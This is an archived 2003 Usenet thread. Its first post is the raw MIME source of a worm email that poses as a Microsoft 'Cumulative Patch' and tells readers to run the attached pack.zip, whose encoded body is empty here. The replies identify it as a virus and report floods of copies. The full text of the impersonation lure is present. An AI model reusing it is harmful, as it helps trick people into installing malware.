f



Check these security pack that came from the MS

--kydfhhswtgawygkf
Content-Type: multipart/related; boundary="rtkjlhxbdliheoa";
	type="multipart/alternative"

--rtkjlhxbdliheoa
Content-Type: multipart/alternative; boundary="zitoggaptmehtxt"

--zitoggaptmehtxt
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Microsoft User

this is the latest version of security update, the
"September 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express.
Install now to protect your computer.
This update includes the functionality =
of all previously released patches.

System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
 - MS Internet Explorer, version 4.01 and later
 - MS Outlook, version 8.00 and later
 - MS Outlook Express, version 4.01 and later

Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.


Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/

For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/

Thank you for using Microsoft products.

Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.

----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.

--zitoggaptmehtxt
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>

<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">&nbsp;
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>

<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>&nbsp;
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A>&nbsp;|&nbsp;
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A>&nbsp;|&nbsp;
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A>&nbsp;|&nbsp;
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>&nbsp;
</FONT>
</TD>
</TR>

<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A>&nbsp;&nbsp;</B>
</FONT>
</TD>
</TR>
</TABLE>

&nbsp;<IMG SRC=3D"cid:pmbiyia" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft User<BR><BR>
this is the latest version of security update, the
"September 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express.
Install now to protect your computer.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>

<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:dygosji" =
ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>

<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:dygosji" =
ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>

<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:dygosji" =
ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>

<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:dygosji" =
ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>

<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:dygosji" =
ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>

<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Product Support Services and Knowledge Base articles
can be found on the <A HREF=3D"http://support.microsoft.com/" =
TARGET=3D"_top">Microsoft Technical Support</A> web site. =
For security-related information about Microsoft products, please =
visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top">
Microsoft Security Advisor</A> web site, =
or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" =
TARGET=3D"_top">Contact Us.</A>
<BR><BR>
Thank you for using Microsoft products.<BR><BR></FONT>
<FONT SIZE=3D"1">Please do not reply to this message. =
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.<BR></FONT>

<HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%">
<FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and =
products mentioned herein are the trademarks =
of their respective owners.</FONT>
</TD></TR></TABLE>

<BR>
<TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB">
<TR VALIGN=3D"TOP">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/=
contactus/contactus.asp" TARGET=3D"_top">Contact Us</A>
&nbsp;|&nbsp;
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" =
TARGET=3D"_top">Legal</A>
&nbsp;|&nbsp;
<A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" =
TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A>
</FONT></B>
</TD>
</TR>

<TR VALIGN=3D"MIDDLE">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1">
&copy;2003 Microsoft Corporation. All rights reserved.
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/cpyright.htm" TARGET=3D"_top">Terms of Use</A>
&nbsp;|&nbsp;
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/privacy.htm" TARGET=3D"_top">
Privacy Statement</A>&nbsp;|&nbsp;
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
enable/" TARGET=3D"_top">Accessibility</A>
</FONT>
</TD>
</TR>

</TABLE>
</BODY>
</HTML>

--zitoggaptmehtxt--

--rtkjlhxbdliheoa
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <pmbiyia>

R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy
zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29
yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX
55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z
3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk
3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt
9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx
/+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r
9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV
606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO
X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg
4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI
sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg
mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD
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

--rtkjlhxbdliheoa
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <dygosji>

R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St
3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7
zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ
CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA
IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza
BxcFCjgwgQSJCQcWCggIADs=

--rtkjlhxbdliheoa--

--kydfhhswtgawygkf
Content-Type: application/x-compressed; name="pack.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment



--kydfhhswtgawygkf--

0
9/19/2003 11:00:15 PM
comp.sys.mac 1198 articles. 0 followers. Post Follow

49 Replies
789 Views

Similar Articles

[PageSpeed] 14

this is a virus/worm

******** IDIOT *************

Sylvia Kleiman wrote:
>   Microsoft <http://www.microsoft.com/> 	  All Products 
> <http://www.microsoft.com/catalog/> |  Support 
> <http://support.microsoft.com/> |  Search 
> <http://search.microsoft.com/> |  Microsoft.com Guide 
> <http://www.microsoft.com/> 
> Microsoft Home <http://www.microsoft.com/>  
> 
>  
> 
> Microsoft User
> 
> this is the latest version of security update, the "September 2003, 
> Cumulative Patch" update which eliminates all known security 
> vulnerabilities affecting MS Internet Explorer, MS Outlook and MS 
> Outlook Express. Install now to protect your computer. This update 
> includes the functionality of all previously released patches.
> 
> 
> 
>  System requirements 	Windows 95/98/Me/2000/NT/XP
>  This update applies to 	MS Internet Explorer, version 4.01 and later
> MS Outlook, version 8.00 and later
> MS Outlook Express, version 4.01 and later
>  Recommendation 	Customers should install the patch at the earliest 
> opportunity.
>  How to install 	Run attached file. Choose Yes on displayed dialog box.
>  How to use 	You don't need to do anything after installing this item.
> 
> 
> Microsoft Product Support Services and Knowledge Base articles can be 
> found on the Microsoft Technical Support <http://support.microsoft.com/> 
> web site. For security-related information about Microsoft products, 
> please visit the Microsoft Security Advisor 
> <http://www.microsoft.com/security> web site, or Contact Us. 
> <http://www.microsoft.com/contactus/contactus.asp>
> 
> Thank you for using Microsoft products.
> 
> Please do not reply to this message. It was sent from an unmonitored 
> e-mail address and we are unable to respond to any replies.
> ------------------------------------------------------------------------
> The names of the actual companies and products mentioned herein are the 
> trademarks of their respective owners.
> 
> 
> 	Contact Us <http://www.microsoft.com/contactus/contactus.asp>  |  Legal 
> <http://www.microsoft.com/legal/>  |  TRUSTe 
> <https://www.truste.org/validate/605>
> 	�2003 Microsoft Corporation. All rights reserved. Terms of Use 
> <http://www.microsoft.com/info/cpyright.htm>  |  Privacy Statement 
> <http://www.microsoft.com/info/privacy.htm> |  Accessibility 
> <http://www.microsoft.com/enable/>
> 

0
Fetch
9/19/2003 11:24:13 PM
In comp.sys.laptops Sylvia Kleiman <lngkkwqsharvbn@rjiya.com> wrote:
: [-- multipart/related, encoding 7bit, 0 lines --]

:     [-- multipart/alternative, encoding 7bit, 0 lines --]

:         [-- text/plain, encoding quoted-printable, charset: US-ASCII, 40 lines --]

: Microsoft User

: this is the latest version of security update, the
: "September 2003, Cumulative Patch" update which eliminates
: all known security vulnerabilities affecting
: MS Internet Explorer, MS Outlook and MS Outlook Express.
: Install now to protect your computer.
: This update includes the functionality of all previously released patches.

: System requirements: Windows 95/98/Me/2000/NT/XP
: This update applies to:
:  - MS Internet Explorer, version 4.01 and later
:  - MS Outlook, version 8.00 and later
:  - MS Outlook Express, version 4.01 and later

: Recommendation: Customers should install the patch at the earliest opportunity.
: How to install: Run attached file.

I got a couple of these viruses today - very nasty.  Some poor souls
who don't know the difference between the real thing and a fake like
this could be in for real trouble...

Andrew
--
----> Portland, Oregon, USA <----
*******************************************************************
 ----> http://www.bizave.com  <---- Photo Albums and Portland Info
 ----> To Email me remove "MYSHOES" from email address
*******************************************************************

0
usenetMYSHOES
9/19/2003 11:26:57 PM
In article <crkraxcuhj50683252407@bizaveMYSHOES.com>, Andrew
<usenetMYSHOES@bizaveMYSHOES.com> wrote:

> I got a couple of these viruses today - very nasty.  Some poor souls
> who don't know the difference between the real thing and a fake like
> this could be in for real trouble...

I've gotten a couple of hundred today, not to mention a couple of
hundred yesterday. Thank goodness I'm on a Mac.
0
pmevans (38)
9/20/2003 2:02:20 AM
Can We say Virus?  I had 6 of these things in my box waiting on me today!

In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
 "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:

> Microsoft User
> 
> this is the latest version of security update, the
> "September 2003, Cumulative Patch" update which eliminates
> all known security vulnerabilities affecting
> MS Internet Explorer, MS Outlook and MS Outlook Express.
> Install now to protect your computer.
> This update includes the functionality of all previously released patches.
> 
> System requirements: Windows 95/98/Me/2000/NT/XP
> This update applies to:
>  - MS Internet Explorer, version 4.01 and later
>  - MS Outlook, version 8.00 and later
>  - MS Outlook Express, version 4.01 and later
> 
> Recommendation: Customers should install the patch at the earliest 
> opportunity.
> How to install: Run attached file. Choose Yes on displayed dialog box.
> How to use: You don't need to do anything after installing this item.
> 
> 
> Microsoft Product Support Services and Knowledge Base articles can be found 
> on the Microsoft Technical Support web site.
> http://support.microsoft.com/
> 
> For security-related information about Microsoft products, please visit the 
> Microsoft Security Advisor web site
> http://www.microsoft.com/security/
> 
> Thank you for using Microsoft products.
> 
> Please do not reply to this message.
> It was sent from an unmonitored e-mail address and we are unable to respond 
> to any replies.
> 
> ----------------------------------------------
> The names of the actual companies and products mentioned herein are the 
> trademarks of their respective owners.
> ---------------------------------------------------------------------
> [Image]
> ---------------------------------------------------------------------
> [Image]
> ---------------------------------------------------------------------

-- 
M. Prindle
http://www.pobox.com/~mprindle
0
M
9/20/2003 2:27:06 AM
M. Prindle <macintoshman.Rem0veTh|s@pobox.com> wrote in message
news:macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net...

> Can We say Virus?  I had 6 of these things in my box waiting on me today!

Only 6 ?  Pfft....


> In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
>  "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:
>
> > Microsoft User
> >
> > this is the latest version of security update, the
> > "September 2003, Cumulative Patch" update which eliminates
> > all known security vulnerabilities affecting
> > MS Internet Explorer, MS Outlook and MS Outlook Express.
> > Install now to protect your computer.
> > This update includes the functionality of all previously released patches.
> >
> > System requirements: Windows 95/98/Me/2000/NT/XP
> > This update applies to:
> >  - MS Internet Explorer, version 4.01 and later
> >  - MS Outlook, version 8.00 and later
> >  - MS Outlook Express, version 4.01 and later
> >
> > Recommendation: Customers should install the patch at the earliest
> > opportunity.
> > How to install: Run attached file. Choose Yes on displayed dialog box.
> > How to use: You don't need to do anything after installing this item.
> >
> >
> > Microsoft Product Support Services and Knowledge Base articles can be found
> > on the Microsoft Technical Support web site.
> > http://support.microsoft.com/
> >
> > For security-related information about Microsoft products, please visit the
> > Microsoft Security Advisor web site
> > http://www.microsoft.com/security/
> >
> > Thank you for using Microsoft products.
> >
> > Please do not reply to this message.
> > It was sent from an unmonitored e-mail address and we are unable to respond
> > to any replies.
> >
> > ----------------------------------------------
> > The names of the actual companies and products mentioned herein are the
> > trademarks of their respective owners.
> > ---------------------------------------------------------------------
> > [Image]
> > ---------------------------------------------------------------------
> > [Image]
> > ---------------------------------------------------------------------
>
> --
> M. Prindle
> http://www.pobox.com/~mprindle


0
Rod
9/20/2003 2:33:40 AM
In comp.sys.mac.comm Rod Speed <rod_speed@yahoo.com> wrote:

> M. Prindle <macintoshman.Rem0veTh|s@pobox.com> wrote in message
> news:macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net...

>> Can We say Virus?  I had 6 of these things in my box waiting on me today!

> Only 6 ?  Pfft....

Currently passing 1500 on my email account over the last 36 hours....

>> In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
>>  "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:
>>
>> > Microsoft User
>> >
>> > this is the latest version of security update, the
>> > "September 2003, Cumulative Patch" update which eliminates
>> > all known security vulnerabilities affecting
>> > MS Internet Explorer, MS Outlook and MS Outlook Express.
>> > Install now to protect your computer.
>> > This update includes the functionality of all previously released patches.
>> >
>> > System requirements: Windows 95/98/Me/2000/NT/XP
>> > This update applies to:
>> >  - MS Internet Explorer, version 4.01 and later
>> >  - MS Outlook, version 8.00 and later
>> >  - MS Outlook Express, version 4.01 and later
>> >
>> > Recommendation: Customers should install the patch at the earliest
>> > opportunity.
>> > How to install: Run attached file. Choose Yes on displayed dialog box.
>> > How to use: You don't need to do anything after installing this item.
>> >
>> >
>> > Microsoft Product Support Services and Knowledge Base articles can be found
>> > on the Microsoft Technical Support web site.
>> > http://support.microsoft.com/
>> >
>> > For security-related information about Microsoft products, please visit the
>> > Microsoft Security Advisor web site
>> > http://www.microsoft.com/security/
>> >
>> > Thank you for using Microsoft products.
>> >
>> > Please do not reply to this message.
>> > It was sent from an unmonitored e-mail address and we are unable to respond
>> > to any replies.
>> >
>> > ----------------------------------------------
>> > The names of the actual companies and products mentioned herein are the
>> > trademarks of their respective owners.
>> > ---------------------------------------------------------------------
>> > [Image]
>> > ---------------------------------------------------------------------
>> > [Image]
>> > ---------------------------------------------------------------------
>>
>> --
>> M. Prindle
>> http://www.pobox.com/~mprindle


0
Joe
9/20/2003 3:28:40 AM
You got a couple of them?  I'm getting one per minute.  I went out to 
dinner and came back to 200 of them in my inbox.


Andrew wrote:

> In comp.sys.laptops Sylvia Kleiman <lngkkwqsharvbn@rjiya.com> wrote:
> : [-- multipart/related, encoding 7bit, 0 lines --]
> 
> :     [-- multipart/alternative, encoding 7bit, 0 lines --]
> 
> :         [-- text/plain, encoding quoted-printable, charset: US-ASCII, 40 lines --]
> 
> : Microsoft User
> 
> : this is the latest version of security update, the
> : "September 2003, Cumulative Patch" update which eliminates
> : all known security vulnerabilities affecting
> : MS Internet Explorer, MS Outlook and MS Outlook Express.
> : Install now to protect your computer.
> : This update includes the functionality of all previously released patches.
> 
> : System requirements: Windows 95/98/Me/2000/NT/XP
> : This update applies to:
> :  - MS Internet Explorer, version 4.01 and later
> :  - MS Outlook, version 8.00 and later
> :  - MS Outlook Express, version 4.01 and later
> 
> : Recommendation: Customers should install the patch at the earliest opportunity.
> : How to install: Run attached file.
> 
> I got a couple of these viruses today - very nasty.  Some poor souls
> who don't know the difference between the real thing and a fake like
> this could be in for real trouble...
> 
> Andrew
> --
> ----> Portland, Oregon, USA <----
> *******************************************************************
>  ----> http://www.bizave.com  <---- Photo Albums and Portland Info
>  ----> To Email me remove "MYSHOES" from email address
> *******************************************************************
> 

0
Barry
9/20/2003 4:00:48 AM
In article 
<macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net
>,
 "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:

> Can We say Virus?  I had 6 of these things in my box waiting on me today!

Check at www.cert.org - the standard.

HTH

Marc

-- 
Marc Heusser - Zurich, Switzerland
Coaching - Consulting - Counselling - Psychotherapy
http://www.heusser.com
remove the obvious CHEERS and MERCIAL... from the reply address
to reply via e-mail
0
Marc
9/20/2003 4:11:59 AM
On 19 Sep 2003 23:26:57 GMT no one of any importance going by the
name of, Andrew said about, "Re: Check these security pack that
came from the MS",  
 
Follow-up set to comp.sys.ibm.pc.games.strategic

>I got a couple

	Only a couple, many have seen 100s of them in the past 2
days.
0
Old
9/20/2003 4:12:49 AM
On Fri, 19 Sep 2003 19:24:13 -0400 no one of any importance going
by the name of, Fetch, Rover, Fetch said about, "Re: Check these
security pack that came from the MS",  

Follow-up set to comp.sys.ibm.pc.games.strategic

 
>this is a virus/worm
>
>******** IDIOT *************

	The idiot is you, for reposting this spam to every NG it
was posted to.  My server blocks spams, but not replys to them by
idiots like you.
0
Old
9/20/2003 4:14:44 AM
Old Salt card carrying Curmudgeon wrote:

> On 19 Sep 2003 23:26:57 GMT no one of any importance going by the
> name of, Andrew said about, "Re: Check these security pack that
> came from the MS",  
>  
> Follow-up set to comp.sys.ibm.pc.games.strategic
> 
> 
>>I got a couple
> 
> 
